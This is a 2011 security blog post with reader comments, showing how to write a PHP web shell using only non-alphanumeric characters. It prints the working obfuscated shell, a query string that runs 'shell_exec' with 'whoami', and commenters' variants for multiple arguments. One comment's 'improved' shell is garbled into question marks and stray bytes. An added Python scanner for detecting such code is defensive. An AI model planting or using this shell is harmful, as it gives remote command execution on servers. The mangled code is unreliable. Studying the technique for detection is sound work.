Non alphanumeric code in PHP
Thursday, 22 September 2011
So a small PHP shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off, I started with the idea of using octal escapes in PHP and constructing the escape sequence myself. For example, \107 is “G”, so if I could construct the “107” and add the backslash to the beginning, maybe I could construct “G”. It worked like this:
$_=+"";//+"" is 0
$_=(++$_)+(++$_)+(++$_)+(++$_);//1+2+3+4 = 10
$__=+"";//0
$__++;//1
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//10*10 + 7 = 107
$___="\\$___";//the string "\107"
But there was no way to evaluate the escape once it was constructed without using alphanumeric characters, so I was stumped.
Then I had a brain wave: PHP automatically converts an array to the string “Array” when it is accessed as a string. That gave me “A”, “r”, “r” etc., but I really needed “GET” in order to create a nice small non-alpha shell.
Onto the second technique: PHP allows you to use bitwise operators on strings 😀
'a'|'b';//0x61|0x62 = 0x63, which is "c"!
We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later, I had combined the characters to create “GET” and thus our small non-alphanumeric PHP shell 😀
<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
The first part converts a string into an array by attempting to assign to the “0” position of the string. Then I make sure the array is a string. Then I use the “A” from “Array” with bitwise operators to construct “G”, “E” and “T” using “A”|0x06, “A”|0x05 and “A”^0x15; the quoted operands are the single raw bytes 0x06, 0x05 and 0x15 (non-printable control characters), not the printable text “0x06”: 0x41 (“A”) | 0x06 = 0x47 (“G”), 0x41 | 0x05 = 0x45 (“E”) and 0x41 ^ 0x15 = 0x54 (“T”). Note that the first step relies on the pre-7.1 behaviour of PHP: since PHP 7.1, writing to an offset of an empty string modifies the string instead of silently turning it into an array. There you have it; you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.
To call the shell you’d use:
?_=shell_exec&__=whoami
Don’t forget: in order to analyze PHP code like this, use RIPS if you ever encounter it in the wild.
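As an added example (not code from the original post), here is a small heuristic scanner that flags PHP sources showing the traits this post describes: underscore-only variable names, variable variables (${...}), bitwise operators applied to quoted strings, control bytes hidden in string literals, dynamically chosen callees, and a near-zero share of alphanumeric characters. The two sample inputs are constructed; the first mirrors the shell above, with the raw bytes written as Python escapes.

```python
import re

# Constructed sample inputs (not taken from any real deployment). The first
# mirrors the shell in the post; "\x06", "\x05", "\x15" are the raw bytes.
OBFUSCATED_SHELL = (
    '<?\n$_="";\n$_[+""]=\'\';\n$_="$_"."";\n'
    '$_=($_[+""]|"\x06").($_[+""]|"\x05").($_[+""]^"\x15");\n?>\n'
    '<?=${\'_\'.$_}[\'_\'](${\'_\'.$_}[\'__\']);?>\n'
)
BENIGN_PAGE = (
    '<?php\n$name = htmlspecialchars($_GET["name"] ?? "guest");\n'
    'echo "<p>Hello, " . $name . "</p>";\n'
)

# Traits of the technique described in the post, each as a regex.
INDICATORS = {
    # variables named only with underscores: $_, $__, $___ (but not $_GET)
    "underscore_vars": re.compile(r"\$_+(?![A-Za-z0-9_])"),
    # variable variables, ${...}, used to reach $_GET without typing it
    "variable_variables": re.compile(r"\$\{"),
    # a single bitwise |, ^ or & with a quoted string as right operand
    "string_bitwise": re.compile(r"""(?<![|&])[|^&](?![|&=])\s*["']"""),
    # non-printable control bytes hidden inside a quoted string
    "control_bytes": re.compile(
        r"""["'][^"']*[\x00-\x08\x0b\x0c\x0e-\x1f][^"']*["']"""),
    # a call whose callee is an array element or a ${...} expression
    "dynamic_call": re.compile(r"[\]}]\s*\("),
}


def scan_php(source: str):
    """Return (indicator hit counts, share of alphanumeric characters)."""
    hits = {name: len(rx.findall(source)) for name, rx in INDICATORS.items()}
    code = re.sub(r"\s+", "", source)  # whitespace does not count in the ratio
    ratio = sum(ch.isalnum() for ch in code) / max(len(code), 1)
    return hits, round(ratio, 2)


def is_suspicious(source: str, max_ratio=0.35, min_indicators=3) -> bool:
    """Flag sources that are almost symbol-only or combine several traits."""
    hits, ratio = scan_php(source)
    return ratio < max_ratio or sum(v > 0 for v in hits.values()) >= min_indicators


if __name__ == "__main__":
    for label, src in (("shell", OBFUSCATED_SHELL), ("benign", BENIGN_PAGE)):
        print(label, is_suspicious(src), scan_php(src))
```

The thresholds are starting points; tune them against your own code base, since legitimate minified or template-heavy PHP can trip a single indicator.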
No. 1 — September 22nd, 2011 at 3:30 pm
Nice techniques! To add, if you wish to call a function with multiple arguments you could use
With
“?_=call_user_func_array&__=shell_exec&___[0]=whoami”
Cheers! 🙂
No. 2 — September 22nd, 2011 at 3:35 pm
Stefan Esser also commented you can get Array without single quotes @$§[]=$§; and of course you can get underscore as well.
No. 3 — September 22nd, 2011 at 3:56 pm
Woah. Awesome Gareth.
However Mathias code seemed to be filtered out; you can find it here: http://downloads.ackack.net/heyes_technique_multi.txt
No. 4 — September 22nd, 2011 at 4:03 pm
Awesome :0
No. 5 — September 22nd, 2011 at 4:13 pm
@Fredrik
You’re missing the first part which requires an Array in order to produce the non-alpha code.
No. 6 — September 22nd, 2011 at 4:18 pm
Woops! I’ll contact Mathias!
No. 7 — September 22nd, 2011 at 4:21 pm
@Gareth
I didn’t include that part because I didn’t change anything in it. You are right, the first part is needed, obviously. My point was only that if you add another variable you don’t have to depend on functions with only one argument, by using call_user_func_array.
No. 8 — September 22nd, 2011 at 4:23 pm
@Mathias
Ah gotcha fair enough!
No. 9 — September 23rd, 2011 at 7:22 pm
Really interesting, but quite scary. Yet another reason to run the httpd inside a jail/chrooted environment with very limited access. 😛
No. 10 — September 24th, 2011 at 11:52 pm
Have to love scripts like this – Why on earth did you build that? BECAUSE I CAN!
I found the way you got GET from ‘A’ fascinating. An excellent read!
No. 11 — September 29th, 2011 at 6:44 am
Great post, it reminded me of jjencode actually.
No. 12 — October 3rd, 2011 at 8:11 pm
Hey Gareth, just found your blog. Great stuff! I wish there were more writers writing about interesting secure coding – this kind of material is hard to find! Subscribed.
No. 13 — October 21st, 2011 at 10:02 am
Another comment. You can strip down the last line by removing all singlequotes and adding an @ for suppressing, since PHP will give you the warning “Notice: Use of undefined constant _ – assumed ‘_’ in […]” and continue to run 🙂
No. 14 — October 21st, 2011 at 10:05 am
@Mathias
I have since improved it and removed all quotes and underscores:
http://hackvertor.co.uk/hvurl/2w
<?php $§[]=$§;$§=$§.$§;$?=+$§;$?=$?;$?++;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$§[$?]|($§[$?]^);$?=$§[$?];$?=$§[$?]|($§[$?]&â);$?=$§[$?+$?];$?=$?^($?.?);$?=$?.$?.$?;$?=$?($?.$?).$?($?.$?.$?).$?($?.$?.$?).$?($?.$?.$?).$?.$?($?.$?.$?);$?($?($?.$?).$?($?.$?.$?).$?($?.$?.$?).$?($?.$?).$?($?.$?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?));?>
No. 15 — October 21st, 2011 at 10:37 am
Touché, that’s really cool man!
No. 16 — October 27th, 2011 at 12:34 pm
When I started reading this the first thing I thought about is exploits! Another was security. You could secure your source code using something like this.
No. 17 — October 27th, 2011 at 1:16 pm
@Jim
Secure is the wrong word, obfuscate is more accurate. The code is hard to de-obfuscate but not impossible.
No. 18 — November 21st, 2011 at 4:34 pm
Are there some reasons to use “alphanumeric code”, or is this only for “fun”?
No. 19 — November 21st, 2011 at 4:38 pm
“Without testing the boundaries of what is possible we cannot hope to provide adequate defences.”
No. 20 — November 21st, 2011 at 4:46 pm
Thanks for your promptitude.